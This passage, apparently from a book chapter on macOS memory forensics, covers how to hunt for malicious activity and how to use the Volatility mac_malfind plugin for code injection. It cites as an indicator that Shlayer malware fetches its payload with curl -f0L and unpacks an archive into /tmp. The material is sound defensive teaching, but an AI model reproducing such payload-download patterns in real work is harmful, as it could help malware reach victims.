Searching for malicious activity
Searching for malicious activity in macOS basically boils down to the basic elements we dealt with in the previous chapters: looking for suspicious network connections, looking for anomalies in processes, looking for code injection, looking for traces of hooking techniques used, and examining the commands executed in the shell. For example, Shlayer uses the shell to download the payload using the curl utility and -f0L as one of the command-line arguments, and to unpack a protected archive into a directory under /tmp using the unzip command. At the same time, running scripts and commands in the shell can be used in more sophisticated attacks when threat actors have direct access to the host.
To look for code injection, we can use the familiar mac_malfind plugin. However, please note here that running the plugin on memory dumps taken from hosts on the M1 chip may cause execution errors:
Figure 11.18 – Volatility mac_malfind...
